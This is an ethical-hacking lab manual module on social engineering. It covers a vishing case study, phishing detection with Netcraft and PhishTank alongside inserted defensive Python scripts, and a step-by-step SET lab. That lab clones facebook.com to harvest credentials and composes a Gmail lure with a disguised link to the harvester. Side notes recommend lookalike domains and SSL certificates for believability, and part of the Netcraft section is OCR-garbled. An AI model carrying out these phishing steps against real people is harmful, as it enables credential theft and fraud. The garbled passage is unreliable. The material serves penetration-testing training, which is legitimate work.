
CEH Lab Manual

Social Engineering
Module 09

Module 09 - Social Engineering

Social Engineering
Social engineering is the art of convincing people to reveal confidential information.

Lab Scenario
Source: http://money.cnn.com/2012/08/07/technology/walmart-hack-defcon/index.htm

Social engineering is essentially the art of gaining access to buildings, systems, or data by exploiting human psychology rather than by breaking in or using technical hacking techniques. The term "social engineering" can also mean an attempt to gain access to information, primarily through misrepresentation, and it often relies on the trusting nature of most individuals. For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.


Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving him information that could be used in a hacker attack, winning a coveted "black badge" in the social engineering contest at the Defcon hackers' conference in Las Vegas. In this year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and his talent for self-effacing small talk to squeeze the following information out of Wal-Mart:

■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-services provider
■ Its employee pay cycle
■ Its staff shift schedule
■ The time managers take their breaks
■ Where they usually go for lunch
■ Type of PC used by the manager
■ Make and version numbers of the computer's operating system, and
■ Its web browser and antivirus software

Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken to the extent of coughing up so much scam-worthy treasure.

Calling from his sound-proofed booth at Defcon, MacDougall placed an "urgent" call, broadcast to the entire Defcon audience, to a Wal-Mart store manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's home office in Bentonville, Ark.

CEH Lab Manual Page 675
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.


The role-playing visher (vishing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract. "Darnell" said that his job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations. But first, he told the store manager, he needed a thorough picture of how the store operated. In the conversation, which lasted about 10 minutes, "Darnell" described himself as a newly hired manager of government logistics. He also spoke offhand about the contract: "All I know is Wal-Mart can make a ton of cash off it," he said, then went on to talk about his upcoming visit, keeping up a "steady patter" about the project and life in Bentonville, Cowley writes.

As if this wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey in preparation for his upcoming visit. The compliant manager obliged, plugging the address into his browser. When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

After ending the call, stepping out of the booth and accepting his well-earned applause, MacDougall became the first Capture the Flag champion to capture every data point, or flag, on the competition checklist in the three years it has been held at Defcon.

Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers is verboten, given that Defcon has no great desire to bring the law down on its head. Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as MacDougall pulled down Wal-Mart's pants.

MacDougall said, "Companies are way more aware about their security. They've got firewalls, intrusion detection, log-in systems going into place, so it's a lot harder for a hacker to break in these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren't protecting, which is the people."

MacDougall also shared a few best practices to be followed to avoid falling victim to a social engineer:

■ Never be afraid to say no. If something feels wrong, something is wrong.
■ An IT department should never be calling asking about operating systems, machines, passwords or email systems; they already know.
■ Set up an internal company security word of the day and don't give any information to anyone who doesn't know it.
■ Keep tabs on what's on the web. Companies inadvertently release tons of information online, including through employees' social media sites.

As an expert ethical hacker and penetration tester, you should circulate these best practices among the employees.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Objectives
The objective of this lab is to:
■ Detect phishing sites
■ Protect the network from phishing attacks

Lab Environment
To carry out this lab, you need:
■ A computer running Windows Server 2012
■ A web browser with Internet access

Lab Duration
Time: 20 Minutes

Overview of Social Engineering
Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are aware of certain valuable information and are careless in protecting it.

Lab Tasks
Recommended labs to assist you in social engineering:
■ Social engineering
■ Detecting phishing using Netcraft
■ Detecting phishing using PhishTank

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Detecting Phishing Using Netcraft
Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Lab Scenario
By now you are familiar with how social engineering is performed and what sort of information can be gathered by a social engineer. Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies. Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

Phishers target the customers of banks and online payment services. They send messages to the bank customers using manipulated URLs and website forgery. The messages claim to be from a bank and look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details. Not all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller ID data to give the appearance that calls come from a trusted organization.

Since you are an expert ethical hacker and penetration tester, you must be aware of phishing attacks occurring on the network and implement anti-phishing measures. In an organization, proper training must be provided to people to deal with phishing attacks. In this lab you will learn to detect phishing using Netcraft.


Lab Objectives
T in s k b w ill sh o w y o u p h ish in g sites u sin g a w e b b ro w s e r a n d sh o w y o u h o w to use th e m . I t w ill te a c h y o u h o w to: ■ ■
^ ~ T o o ls

D e te c t p h ish in g sites P ro te c t th e n e tw o rk fro m p h ish in g attack

T o carry o u t tins lab y o u need:

dem onstrated in this lab are available in D:\CEHTools\CEHv8 Module 09 Social Engineering


N etcraft is lo c a te d at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
Y o u can also d o w n lo a d th e la test v e rsio n o f Netcraft Toolbar fro m th e link h t t p : / /to o lb a r .n e tc r a lt.c o m / I f y o u d ecid e to d o w n lo a d th e la te st version, th e n sc re e n sh o ts sh o w n
111 th e lab m ig h t d iffer

■ ■ ■

A c o m p u te r ru n n in g W in d o w s S erv er 2012 A w e b b ro w se r (F irefox, I n te r n e t ex p lo rer, etc.) w ith In te rn e t access A d m in istra tiv e privileges to r u n th e N e tc r a lt to o lb a r

Lab Duration
Time: 10 Minutes

Overview of Netcraft Toolbar
Netcraft Toolbar provides Internet security services, including anti-fraud and anti-phishing services, application testing, code reviews, automated penetration testing, and research data and analysis on many aspects of the Internet.

Lab Tasks
TASK 1: Anti-Phishing Toolbar

1. To start this lab, you need to launch a web browser first. In this lab we have used Mozilla Firefox. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

2.

FIGURE 1.1: Windows Server 2012 Start Menu

3. Click the Mozilla Firefox app to launch the browser.

FIGURE 1.2: Windows Server 2012 Start Menu Apps view

4. To download the Netcraft Toolbar for Mozilla Firefox, enter http://toolbar.netcraft.com in the address bar of the browser, or drag and drop the netcraft_toolbar-1.7-fx.xpi file into Firefox. In this lab, we are downloading the toolbar from the Internet. In the Firefox browser, click Download the Netcraft Toolbar to install it as an add-on.

5.

6.

FIGURE 1.3: Netcraft toolbar download page


7. On the Install page of the Netcraft Toolbar site, click the Firefox image to continue with the installation.

Netcraft is an Internet services company based in Bath, England.

FIGURE 1.4: Netcraft toolbar Installation page

8. Click Allow to download the Netcraft Toolbar.

FIGURE 1.5: Netcraft toolbar installation, Allow button

9. When the Software Installation dialog box appears, click Install Now. The dialog warns you to install add-ons only from authors whom you trust, because malicious software can damage your computer or violate your privacy, and it names the item to be installed: Netcraft Anti-Phishing Toolbar (Netcraft Ltd).

Netcraft Toolbar provides a wealth of information about the sites you visit.

FIGURE 1.6: Installing Netcraft Toolbar

10. To complete the installation it will ask you to restart the browser. Click Restart Now.

Risk Rating displays the trustworthiness of the current site.

FIGURE 1.7: Restarting Firefox browser

11. Netcraft Toolbar is now visible. Once the Toolbar is installed, it looks similar to the following figure.

FIGURE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. When you visit a site, the following information displays in the Toolbar (unless the page has been blocked): Risk rating, Rank, and Flag.

13. Click Site Report to show the report of the site.

Site report links to a detailed report for the site.

FIGURE 1.9: Report generated by Netcraft Toolbar

14. If you attempt to visit a page that has been identified as a phishing page by Netcraft Toolbar, you will see a warning dialog that looks similar to the one in the following figure.

15. Type, as an example: http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin

Phishing site feeds: a continuously updated encrypted database of patterns that match phishing URLs reported by the Netcraft Toolbar.

FIGURE 1.10: Warning dialog for blocked site

16. If you trust that page, click Yes to open it; if you don't, click No (Recommended) to block that page.

17. If you click No, the following page will be displayed.

FIGURE 1.11: Web page blocked by Netcraft Toolbar
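As an added example for this lab (not Netcraft's code, and not how the toolbar itself classifies pages), the following Python script applies a few of the checks a reviewer would run on a URL like the one in step 15 before trusting it: a well-known brand appearing in the subdomain or path but not in the domain the attacker actually registered, a raw IP address in place of a hostname, a user:pass@ prefix that hides the real host, and an unusually deep or numeric subdomain chain. The brand watch-list, the thresholds, and the rule that approximates the registrable domain as the last two host labels are assumptions made for the example; a production tool would consult the Public Suffix List instead.

```python
"""Heuristic screen for look-alike phishing URLs.

Added example for this lab, not Netcraft code. The brand watch-list,
the thresholds, and the two-label approximation of the registrable
domain are assumptions chosen for the illustration; a real tool would
consult the Public Suffix List (this one mis-splits 'example.co.uk').
"""
import ipaddress
from urllib.parse import urlsplit

# Assumed watch-list of frequently impersonated brands (constructed for the example).
WATCHED_BRANDS = ("paypal", "apple", "microsoft", "amazon", "bankofamerica")

# Assumed threshold: this many labels before the registrable domain is unusual.
DEEP_SUBDOMAIN_LABELS = 3


def is_ip_literal(host: str) -> bool:
    """True if the host part is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def registrable_domain(host: str) -> str:
    """Approximate the attacker-controlled domain as the last two labels (assumption)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def analyze_url(url: str) -> dict:
    """Return host, registrable domain, a list of findings, and a score.

    The score is just the number of findings: 0 means nothing here fired,
    which is not the same as 'safe' (a fresh phish on a clean domain scores 0).
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    findings = []
    if not host:
        return {"host": "", "registrable": "", "findings": ["no host in URL"], "score": 1}

    if parts.username is not None:
        # Everything before '@' is ignored by the browser; it is commonly
        # stuffed with a trusted-looking name so the real host is overlooked.
        findings.append("user:pass@ prefix hides the real host")

    if is_ip_literal(host):
        registrable = host
        findings.append("host is a raw IP address instead of a domain name")
    else:
        registrable = registrable_domain(host)
        sub = host[: len(host) - len(registrable)].rstrip(".")
        sub_labels = sub.split(".") if sub else []
        # Brand name in the subdomains or path but not in the registered
        # domain: the 'paypal.ca.<junk>.<attacker-domain>' pattern.
        for brand in WATCHED_BRANDS:
            seen = brand in sub or brand in parts.path.lower()
            if seen and brand not in registrable:
                findings.append(f"brand '{brand}' appears outside the registrable domain '{registrable}'")
        if len(sub_labels) >= DEEP_SUBDOMAIN_LABELS:
            findings.append(f"deep subdomain chain ({len(sub_labels)} labels before '{registrable}')")
        if any(label.isdigit() for label in sub_labels):
            findings.append("purely numeric subdomain label")

    return {"host": host, "registrable": registrable, "findings": findings, "score": len(findings)}


if __name__ == "__main__":
    for sample in (
        "http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin",  # the lab's example URL
        "https://www.paypal.com/signin",                          # legitimate shape
        "http://paypal.com@203.0.113.5/login",                    # userinfo trick, constructed
    ):
        result = analyze_url(sample)
        print(f"{result['score']}  {sample}")
        for finding in result["findings"]:
            print("   -", finding)
```

The lab's example URL trips three of the rules (brand outside the registrable domain secure7c.mx, a four-label subdomain chain, and the numeric label 6551), whereas https://www.paypal.com/signin trips none. Treat the score as a triage aid, not a verdict: it cannot see a phish hosted on a freshly registered, unremarkable domain, which is exactly the gap a reputation feed like Netcraft's is meant to cover.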

Lab Analysis
Document all the results and reports gathered during the lab.

Tool/Utility: Netcraft
Information Collected/Objectives Achieved:
■ Phishing site detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy.
2. Determine if you can make the Netcraft Toolbar coexist on the same line as other toolbars. If so, how?
3. How can you stop the Toolbar warning if a site is trusted?

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs

Detecting Phishing Using PhishTank
PhishTank is a collaborative clearinghouse for data and information regarding phishing on the Internet.

Lab Scenario
Phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they have been sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information such as account user names and passwords that can further expose them to future compromises. Additionally, these fraudulent websites may contain malicious code. With the tremendous increase in the use of online banking, online share trading, and e-commerce, there has been a corresponding growth in the incidents of phishing being used to carry out financial frauds. Phishing involves fraudulently acquiring sensitive information (e.g. passwords, credit card details, etc.) by masquerading as a trusted entity.

In the previous lab you have already seen how a phishing site can be detected using the Netcraft tool.

The usual scenario is that the victim receives an email that appears to have been sent from his bank. The email urges the victim to click on the link in the email. When the victim does so, he is taken to "a secure page on the bank's website." The victim believes the web page to be authentic and he enters his user name, password, and other information. In reality, the website is a fake and the victim's information is stolen and misused.

Being an administrator or penetration tester, you might implement all the most sophisticated and expensive technology solutions in the world; all of it can be bypassed if your employees fall for simple social engineering scams. It becomes your responsibility to educate employees on best practices for protecting information. Phishing sites or emails can be reported to phishing-report@us-cert.gov (http://www.us-cert.gov/nav/report_phishing.html). US-CERT (United States Computer Emergency Readiness Team) is collecting phishing email messages and website locations so that they can help people avoid becoming victims of phishing scams.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Objectives
This lab will show you how to check suspected phishing sites using a web browser. It will teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attacks

Lab Environment
To carry out the lab you need:
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access

Lab Duration
Time: 10 Minutes

Overview of PhishTank
PhishTank URL: http://www.phishtank.com

PhishTank is a free community site where anyone can submit, verify, track, and share phishing data. PhishTank is a collaborative clearinghouse for data and information regarding phishing on the Internet. Also, PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.

Lab Tasks
TASK 1: PhishTank

1. To start this lab you need to launch a web browser first. In this lab we have used Mozilla Firefox. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

2.

FIGURE 2.1: Windows Server 2012 Start Menu

3. Click the Mozilla Firefox app to launch the browser.

FIGURE 2.2: Windows Server 2012 Start Menu Apps view

4. Type http://www.phishtank.com in the address bar of the web browser and press Enter. You will see the PhishTank welcome screen, which invites you to join the fight against phishing: submit suspected phishes, track the status of your submissions, verify other users' submissions, and develop software with the free API.

5.

FIGURE 2.3: Welcome screen of PhishTank

PhishTank is operated by OpenDNS to improve the Internet through safer, faster, and smarter DNS.

6. Type the website URL to be checked for phishing, for example http://sdapld21.host21.com. Click Is it a phish?.

FIGURE 2.4: Checking for site

7. If the site is a phishing site, you see the following warning dialog box.

OpenDNS is interested in having the best available information about phishing websites.

FIGURE 2.5: Warning dialog for phishing site (the submission is shown as currently ONLINE; you can sign in or register to verify the submission)
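The overview above notes that PhishTank exposes its data through a free API so that applications can make the same "Is it a phish?" decision you just made by hand. As an added example for this lab (not PhishTank's code, and not its real feed or API format), the following Python script shows the part that integrations most often get wrong: the URL must be canonicalised before it is compared with the feed, or a change of case, an explicit default port, a missing trailing slash or a fragment lets a listed phish slip past an exact-match check. The feed rows are constructed sample data in an assumed shape (url, verified, online); the two lab URLs are reused as entries, and the third uses a reserved .example name.

```python
"""Look a URL up in a local snapshot of a phishing feed.

Added example for this lab, not PhishTank code. The feed rows below are
constructed sample data in an assumed shape (url, verified, online);
PhishTank's real feed and API formats are not reproduced here.
"""
from urllib.parse import urlsplit, urlunsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed sample feed (assumed shape). The first two URLs are the ones
# this module uses as examples; the third uses a reserved .example name.
SAMPLE_FEED = [
    {"url": "http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin", "verified": True, "online": True},
    {"url": "http://sdapld21.host21.com/", "verified": False, "online": True},
    {"url": "https://login.bank.evil.example/auth", "verified": True, "online": False},
]


def normalize_url(url: str) -> str:
    """Canonical form used as the lookup key.

    Lower-cases scheme and host, drops a default port and the fragment,
    and makes an empty path '/'. Query strings are kept, since phishing
    kits often key the landing page on a query parameter.
    """
    p = urlsplit(url.strip())
    scheme = p.scheme.lower()
    host = (p.hostname or "").lower()
    if ":" in host:            # IPv6 literal: urlsplit strips the brackets
        host = f"[{host}]"
    port = p.port
    if port is not None and DEFAULT_PORTS.get(scheme) != port:
        host = f"{host}:{port}"
    return urlunsplit((scheme, host, p.path or "/", p.query, ""))


class PhishIndex:
    """In-memory index over feed rows, keyed by normalized URL and by host."""

    def __init__(self, rows):
        self._exact = {}
        self._hosts = set()
        for row in rows:
            key = normalize_url(row["url"])
            self._exact[key] = row
            self._hosts.add(urlsplit(key).hostname)

    def lookup(self, url: str) -> dict:
        """Classify a URL against the snapshot.

        'verified' / 'reported' are exact matches (row verified or not);
        'host_reported' means only the host is known from another entry;
        'unknown' means the snapshot has nothing, which is not a clearance:
        the feed lags behind new phishes, so combine it with other signals.
        """
        key = normalize_url(url)
        row = self._exact.get(key)
        if row is not None:
            return {"status": "verified" if row["verified"] else "reported",
                    "online": row["online"], "match": "exact"}
        if urlsplit(key).hostname in self._hosts:
            return {"status": "host_reported", "online": None, "match": "host"}
        return {"status": "unknown", "online": None, "match": None}


if __name__ == "__main__":
    index = PhishIndex(SAMPLE_FEED)
    for url in ("HTTP://WWW.PayPal.ca.6551.secure7c.mx:80/images/cgi.bin#form",
                "http://sdapld21.host21.com",
                "http://sdapld21.host21.com/other-page",
                "https://www.paypal.com/"):
        print(f"{index.lookup(url)['status']:14} {url}")
```

Two design points matter here. First, the index distinguishes a verified entry from a merely reported one, because PhishTank submissions are community-reported and only later verified, so an integration should not block on an unverified report with the same confidence as on a verified one. Second, an "unknown" result is just that: question 3 below asks why OpenDNS may block a site PhishTank does not yet list, and the answer is that any single feed lags, so a miss must never be treated as a clean bill of health.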

Lab Analysis
Document all the websites and verify whether they are phishing sites.

Tool/Utility: PhishTank
Information Collected/Objectives Achieved:
■ Phishing site detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate what PhishTank wants to hear about spam.
2. Does PhishTank protect you from phishing?
3. Why is OpenDNS blocking a phish site that PhishTank doesn't list or has not yet verified?

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs

Social Engineering Penetration Testing using Social Engineering Toolkit (SET)
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering.

Lab Scenario
Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies every day. Even though there are many hacking tools available within underground hacking communities, a social engineering toolkit is a boon for attackers, as it is freely available to use to perform spear-phishing attacks, website attacks, etc. Attackers can draft email messages, attach malicious files, and send them to a large number of people using the spear-phishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/Tabnabbing, etc. all at once. Though numerous sorts of attacks can be performed using this toolkit, it is also a must-have tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily within the security community. As an ethical hacker, penetration tester, or security administrator, you should be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network.

Lab Objectives
The objective of this lab is to help students learn to:
■ Clone a website
■ Obtain user names and passwords using the Credential Harvester method
■ Generate reports for conducted penetration tests

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Environment
To carry out the lab, you need:
■ Run this tool in a BackTrack virtual machine
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 10 Minutes

Overview of Social Engineering Toolkit
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering. SET is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Lab Tasks
TASK 1: Execute Social Engineering Toolkit

1. Log in to your BackTrack virtual machine.

2. Select Applications → BackTrack → Exploitation Tools → Social Engineering Tools → Social Engineering Toolkit and click set.

FIGURE 3.1: Launching SET in BackTrack


3. A Terminal window for SET will appear. Type y and press Enter to agree to the terms of service. The agreement notes that the toolkit is provided as-is, royalty-free and open-source under BSD-style licensing, and that by typing yes (only one time) you agree to the terms of service and that you will only use this tool for lawful purposes.

SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon.

The web jacking attack is performed by replacing the victim's browser with another window that is made to look and appear to be a legitimate site.

FIGURE 3.2: SET Service Agreement option

4.

Y o u w ill b e p re s e n te d w ill a list o f m e n u s to select th e task. T y p e 1 an d p ress Enter to select th e Social-Engineering A ttacks o p tio n .
SET allows you to specially craft email messages and send them to a large (or small) number of people with attached file format malicious payloads.

[Screenshot: SET main menu in the Terminal window, listing 1) Social-Engineering Attacks, 2) Fast-Track Penetration Testing, 3) Third Party Modules, 4) Update the Metasploit Framework, 5) Update the Social-Engineer Toolkit, 6) Update SET configuration, 7) Help, Credits, and About, 99) Exit the Social-Engineer Toolkit.]
FIGURE 3.3: SET Main menu

5. A list of menus in Social-Engineering Attacks will appear; type 2 and press Enter to select Website Attack Vectors.

CEH Lab Manual Page 692

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Module 09 - Social Engineering

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

[Screenshot: Social-Engineering Attacks menu in the Terminal window, listing 1) Spear-Phishing Attack Vectors, 2) Website Attack Vectors, 3) Infectious Media Generator, 4) Create a Payload and Listener, 5) Mass Mailer Attack, 6) Arduino-Based Attack Vector, 7) SMS Spoofing Attack Vector, 8) Wireless Access Point Attack Vector, 9) QRCode Generator Attack Vector, 10) Powershell Attack Vectors, 11) Third Party Modules, 99) Return back to the main menu.]
FIGURE 3.4: Social Engineering Attacks menu

6. In the next set of menus that appears, type 3 and press Enter to select the Credential Harvester Attack Method.
The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

[Screenshot: Website Attack Vectors menu in the Terminal window. The method descriptions are followed by the options 1) Java Applet Attack Method, 2) Metasploit Browser Exploit Method, 3) Credential Harvester Attack Method, 4) Tabnabbing Attack Method, 5) Man Left in the Middle Attack Method, 6) Web Jacking Attack Method, 7) Multi-Attack Web Method, 8) Victim Web Profiler, 9) Create or import a CodeSigning Certificate, 99) Return to Main Menu; option 3 is entered at the set:webattack> prompt.]
FIGURE 3.5: Website Attack Vectors menu

7. Now, type 2 and press Enter to select the Site Cloner option from the menu.


The Site Cloner is used to clone a website of your choice.

[Screenshot: Credential Harvester Attack menu in the Terminal window, describing the three methods and listing 1) Web Templates, 2) Site Cloner, 3) Custom Import, 99) Return to Webattack Menu.]

FIGURE 3.6: Credential Harvester Attack menu

8. Type the IP address of your BackTrack virtual PC in the prompt for IP address for the POST back in Harvester/Tabnabbing and press Enter. In this example, the IP is 10.0.0.15.
The tabnabbing attack method is used when a victim has multiple tabs open; when the user clicks the link, the victim will be presented with a "Please wait while the page loads". When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserted, they are harvested and the user is redirected back to the original website.

[Screenshot: Terminal window after choosing Site Cloner. SET explains that the Credential Harvester will use its clone capabilities to harvest credentials or parameters from a website and place them into a report, and asks for the IP address the server will POST to (use your external IP if you are using one). The IP 10.0.0.15 is entered at the prompt IP address for the POST back in Harvester/Tabnabbing.]

FIGURE 3.7: Providing IP address in Harvester/Tabnabbing

9. Now, you will be prompted for a URL to be cloned; type the desired URL at Enter the url to clone and press Enter. In this example, we have used www.facebook.com. This will initiate the cloning of the specified website.


The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

[Screenshot: Terminal window showing the IP address 10.0.0.15 accepted for the POST back, the note that SET supports both HTTP and HTTPS with the example http://www.thisisafakesite.com, and www.facebook.com entered at the prompt Enter the url to clone.]

FIGURE 3.8: Providing URL to be cloned

10. After cloning is completed, the highlighted message, as shown in the following screenshot, will appear on the Terminal screen of SET. Press Enter to continue.

11. It will start Credential Harvester.

If you're doing a penetration test, register a name that's similar to the victim; for Gmail you could do gmai1.com (notice the 1), something similar that can mistake the user into thinking it's the legitimate
[Screenshot: Terminal window showing "Cloning the website: https://login.facebook.com/login.php. This could take a little bit...", a highlighted note that this attack works best when username and password fields are available and captures all POSTs on a website, and the message "I have read the above message. Press <return> to continue".]

FIGURE 3.9: SET Website Cloning

12. Leave the Credential Harvester Attack to fetch information from the victim's machine.


When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So for example if you're cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.

[Screenshot: Terminal window showing the Credential Harvester setup messages followed by "Social-Engineer Toolkit Credential Harvester Attack", "Credential Harvester is running on port 80" and "Information will be displayed to you as it arrives below:".]

FIGURE 3.10: SET Credential Harvester Attack

13. Now, you have to send the IP address of your BackTrack machine to a victim and trick him or her into clicking it to browse to the IP address.

14. For this demo, launch your web browser in the BackTrack machine and open your favorite email service. In this example we have used www.gmail.com. Log in to your Gmail account and compose an email.

Most of the time they won't even notice the IP, but it's just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials.

FIGURE 3.11: Composing email in Gmail

15. Place the cursor in the body of the email where you wish to place the fake URL. Then, click the Link icon.

[Screenshot: Gmail Compose Mail window in Mozilla Firefox on BackTrack. The message to a @yahoo.com address has the subject "TGIF - Party Pictures" and the body "Hello Sam, Please click this link to view the weekend party pictures at TGIF with the celebrities. Regards."; the Link icon in the formatting toolbar is highlighted.]

FIGURE 3.12: Linking Fake URL to Actual URL

16. In the Edit Link window, first type the actual address in the Web address field under the Link to option and then type the fake URL in the Text to display field. In this example, the web address we have used is http://10.0.0.15 and the text to display is www.facebook.com/Rini TGIF. Click OK.

[Screenshot: Gmail Edit Link dialog with Text to display set to www.facebook.com/Rini TGIF, Link to set to Web address, and "To what URL should this link go?" set to http://10.0.0.15, with OK and Cancel buttons.]

FIGURE 3.13: Edit Link window

17. The fake URL should appear in the email body, as shown in the following screenshot.


[Screenshot: Gmail Compose Mail window with the message body now reading "Hello Sam, Please click this link www.facebook.com/Rini TGIF to view the weekend party pictures at TGIF with the celebrities. Regards.", the fake URL shown as a hyperlink.]

FIGURE 3.14: Adding Fake URL in the email content

18. To verify that the fake URL is linked to the actual URL, click the fake URL; it will display the actual URL after Go to link:. Send the email to the intended user.

In some cases when you're performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well, however there will be an "untrusted" warning when a victim goes to your website.

[Screenshot: Gmail Compose Mail window with the linked text www.facebook.com/Rini TGIF selected; the link tooltip reads "Go to link: http://10.0.0.15/ - Change Remove".]

FIGURE 3.15: Actual URL linked to Fake URL
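The link built in steps 16 to 18 shows one host in its text while its href points at another, and that disagreement is exactly what a mail gateway or awareness tool can flag. The following script is an added example, not part of the lab manual or of SET; the e-mail body is constructed to mirror the lab's message, and the host names and the 10.0.0.15 address are taken from the lab text as placeholders.

```python
# Flag e-mail links whose visible text names a different host than the href
# (the lookalike link built in steps 16-18). Added example, not from the manual.
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress
import re

# A bare host name or URL appearing in link text, e.g. "www.facebook.com/Rini TGIF"
_HOST_IN_TEXT = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.IGNORECASE)


def _host_of(url):
    """Lowercase host part of an href; a scheme is prepended if the href lacks one."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def _is_ip(host):
    """True when the host is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def find_suspicious_links(html):
    """Return one finding per link whose text and href disagree about the destination."""
    parser = _LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = _host_of(href)
        match = _HOST_IN_TEXT.search(text)
        shown = match.group(1).lower() if match else None
        reasons = []
        if _is_ip(target):
            reasons.append("href points at a bare IP address")
        # A subdomain of the shown host (login.facebook.com under facebook.com) is fine.
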